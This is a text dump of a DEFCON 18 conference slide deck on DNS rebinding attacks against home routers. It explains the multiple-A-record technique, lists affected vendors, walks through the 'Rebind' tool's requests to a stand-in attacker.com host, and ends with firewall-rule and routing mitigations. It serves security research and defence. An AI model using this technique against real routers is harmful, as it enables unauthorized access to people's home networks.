defcon 18 heffner routers

8/9/2019 DEFCON 18 Heffner Routers

1/88

How to Hack Millions of Routers

Craig Heffner, Seismic LLC


2/88

SOHO RouterSecurity?


3/88

Common Attack Techniques

Cross Site Request Forgery No trust relationship between browser and router

Cant forge Basic Authentication credentials

Anti-CSRF

Limited by the same origin policy

DNS Rebinding

Rebinding prevention by OpenDNS / NoScript / DNSWall

Most rebinding attacks no longer work Most


4/88

Multiple A Record Attack

Better known as DNS load balancing / redundancy

Return multiple IP addresses in DNS response

Browser attempts to connect to each IP addresses in order

If one IP goes down, browser switches to the next IP in the list

Limited attack

Can rebind to any public IP address

Cant rebind to an RFC1918 IP addresses


5/88

Rebinding to a Public IP

1.4.1.4

2.3.5.8

Target IP: 2.3.5.8Attacker IP: 1.4.1.4Attacker Domain: attacker.com


6/88


1.4.1.4

2.3.5.8

What is the IP address forattacker.com?


7/88


1.4.1.4

2.3.5.8

1.4.1.42.3.5.8


8/88


1.4.1.4

2.3.5.8

GET / HTTP/1.1Host: attacker.com


9/88


1.4.1.4

2.3.5.8


10/88


1.4.1.4

2.3.5.8



11/88


1.4.1.4

2.3.5.8

TCP RST


12/88


1.4.1.4

2.3.5.8



13/88


1.4.1.4

2.3.5.8


14/88

Rebinding to a Private IP

1.4.1.4


192.168.1.1


15/88


1.4.1.4


192.168.1.1


16/88


1.4.1.4

1.4.1.4192.168.1.1

192.168.1.1


17/88


1.4.1.4


192.168.1.1


18/88


1.4.1.4

192.168.1.1


19/88

Services Bound to All Interfaces

# netstatl

Active Internet connections (only servers)

Proto Recv-Q Send-Q Local Address Foreign Address State

tcp 0 0 *:80 *:* LISTEN

tcp 0 0 *:53 *:* LISTEN

tcp 0 0 *:22 *:* LISTEN

tcp 0 0 *:23 *:* LISTEN


20/88

Firewall Rules Based on Interface Names

-A INPUTi ethoj DROP -A INPUTj ACCEPT


21/88

IP Stack Implementations

RFC 1122 defines two IP models: Strong End System Model

Weak End System Model


22/88

The Weak End System Model

RFC 1122, Weak End System Model:

A host MAY silently discard an incoming datagram whosedestination address does not correspond to the physicalinterface through which it is received.

A host MAY restrict itself to sending (non-source-routed) IPdatagrams only through the physical interface that correspondsto the IP source address of the datagrams.


23/88


eth1192.168.1.1

eth02.3.5.8


24/88


TCP SYN PacketSource IP: 192.168.1.100Destination IP: 2.3.5.8Destination Port: 80

eth1192.168.1.1

eth02.3.5.8


25/88


TCP SYN/ACK PacketSource IP: 2.3.5.8Destination IP: 192.168.1.100Source Port: 80

eth1192.168.1.1

eth02.3.5.8


26/88


TCP ACK PacketSource IP: 192.168.1.100Destination IP: 2.3.5.8Destination Port: 80

eth1192.168.1.1

eth02.3.5.8


27/88

Traffic Capture


28/88

End Result


29/88

Public IP Rebinding Attack

1.4.1.4


2.3.5.8


30/88


1.4.1.4


2.3.5.8


31/88


1.4.1.4

1.4.1.42.3.5.8

2.3.5.8


32/88


1.4.1.4


2.3.5.8


33/88


1.4.1.4

...

2.3.5.8


34/88


1.4.1.4


2.3.5.8


35/88


1.4.1.4

TCP RST

2.3.5.8


36/88


1.4.1.4


2.3.5.8


37/88


1.4.1.4

2.3.5.8


38/88


Pros:

Nearly instant rebind, no delay or waiting period

Dont need to know routers internal IP

Works in all major browsers: IE, FF, Opera, Safari, Chrome

Cons:

Router must meet very specific conditions

Must bind Web server to the WAN interface

Firewall rules must be based on interface names, not IP addresses Must implement the weak end system model

Not all routers are vulnerable


39/88

Affected Routers


40/88

Asus


41/88

Belkin


42/88

Dell


43/88

Thompson


44/88

Linksys


45/88

Third Party Firmware


46/88

ActionTec


47/88

Making the Attack Practical

To make the attack practical:

Must obtain targets public IP address automatically

Must coordinate services (DNS, Web, Firewall)

Must do something useful


48/88

Tool Release: Rebind

Provides all necessary services

DNS, Web, Firewall

Serves up JavaScript code

Limits foreground activity Makes use of cross-domain XHR, if supported

Supports all major Web browsers

Attacker can browse target routers in real-time Via a standard HTTP proxy


49/88

Rebind

2.3.5.8 1.4.1.4

Target IP: 2.3.5.8Rebind IP: 1.4.1.4Attacker Domain: attacker.com


50/88

Rebind


51/88

Rebind


52/88

Rebind

2.3.5.8 1.4.1.4



53/88

Rebind

2.3.5.8 1.4.1.4

1.4.1.4


54/88

Rebind

2.3.5.8 1.4.1.4

GET /init HTTP/1.1Host: attacker.com


55/88

Rebind

2.3.5.8 1.4.1.4

Location: http://wacme.attacker.com/exec


56/88

Rebind

2.3.5.8 1.4.1.4

What is the IP address forwacme.attacker.com?


57/88

Rebind

2.3.5.8 1.4.1.4

1.4.1.42.3.5.8


58/88

Rebind

2.3.5.8 1.4.1.4

GET /exec HTTP/1.1Host: wacme.attacker.com


59/88

Rebind

2.3.5.8 1.4.1.4


60/88

Rebind

2.3.5.8 1.4.1.4

GET / HTTP/1.1Host: wacme.attacker.com


61/88

Rebind

2.3.5.8 1.4.1.4

TCP RST


62/88

Rebind

2.3.5.8 1.4.1.4



63/88

Rebind

2.3.5.8 1.4.1.4


64/88

Rebind

2.3.5.8 1.4.1.4

GET /poll HTTP/1.1Host: attacker.com:81


65/88

Rebind

2.3.5.8 1.4.1.4


66/88

Rebind


67/88

Rebind

2.3.5.8 1.4.1.4

GET http://2.3.5.8/ HTTP/1.1


68/88

Rebind

2.3.5.8 1.4.1.4

GET /poll HTTP/1.1Host: attacker.com:81


69/88

Rebind

2.3.5.8 1.4.1.4

GET / HTTP/1.1


70/88

Rebind

2.3.5.8 1.4.1.4



71/88

Rebind

2.3.5.8 1.4.1.4


72/88

Rebind

2.3.5.8 1.4.1.4

POST /exec HTTP/1.1Host: attacker.com:81


73/88

Rebind

2.3.5.8 1.4.1.4


74/88

Rebind


75/88

Demo


76/88

More Fun With Rebind

Attacking SOAP services

UPnP

HNAP

We can rebind to any public IP Proxy attacks to other Web sites via your browser

As long as the site doesnt check the host header


77/88

DNS Rebinding Countermeasures


78/88

Am I Vulnerable?


79/88

End-User Mitigations

Break any of the attacks conditions

Interface binding

Firewall rules

Routing rules

Disable the HTTP administrative interface

Reduce the impact of the attack

Basic security precautions


80/88

Blocking Attacks at the Router

Dont bind services to the external interface

May not have sufficient access to the router to change this

Some services dont give you a choice

Re-configure firewall rules -A INPUTi eth1d 172.69.0.0/16j DROP


81/88

HTTP Administrative Interface

Disable the HTTP interface

Use HTTPS / SSH

Disable UPnP while youre at it

But be warned Enabling HTTPS wont disable HTTP

In some routers you cant disable HTTP

Some routers have HTTP listening on alternate ports

In some routers you cant disable HNAP


82/88

Blocking Attacks at the Host

Re-configure firewall rules

-A INPUTd 172.69.0.0/16j DROP

Configure dummy routes

route add -net 172.69.0.0/16 gw 127.0.0.1


83/88

Basic Security Precautions

Change your routers default password

Keep your firmware up to date

Dont trust un-trusted content


84/88

Vendor / Industry Solutions

Fix the same-origin policy in browsers

Implement the strong end system model in routers

Build DNS rebinding mitigations into routers

l i


85/88

Conclusion

DNS rebinding still poses a threat to your LAN

Tools are available to exploit DNS rebinding

Only you can prevent forest fires

Q & A


86/88

Q & A

Rebind project

http://rebind.googlecode.com

Contact

[email protected]


87/88

R f


88/88

References

Same Origin Policy

http://en.wikipedia.org/wiki/Same_origin_policy

RFC 1122

http://www.faqs.org/rfcs/rfc1122.html

Loopback and Multi-Homed Routing Flaw http://seclists.org/bugtraq/2001/Mar/42

TCP/IP Illustrated Volume 2, W. Richard Stevens

p. 218219

defcon 18 heffner routers

Documents